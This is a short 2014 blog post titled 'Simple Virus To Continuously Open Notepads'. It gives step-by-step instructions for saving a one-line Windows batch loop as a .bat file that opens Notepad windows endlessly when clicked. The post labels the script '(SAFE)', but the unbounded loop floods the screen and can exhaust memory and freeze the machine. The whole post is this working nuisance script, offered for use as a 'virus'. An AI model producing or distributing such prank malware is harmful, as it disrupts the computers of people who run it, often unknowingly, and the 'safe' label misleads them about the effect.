Thursday 26 June 2014

Simple Virus To Continuously Open Notepads

(SAFE)
1. Click on Start-> Run -> Notepad.
2. In Notepad Paste the following code.

@ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top
    
3. Now Save the file with an extension ".bat" , for e.g: "notepad.bat"
4. If you click on "notepad.bat" , it will continuously open notepads.

No comments:

Post a Comment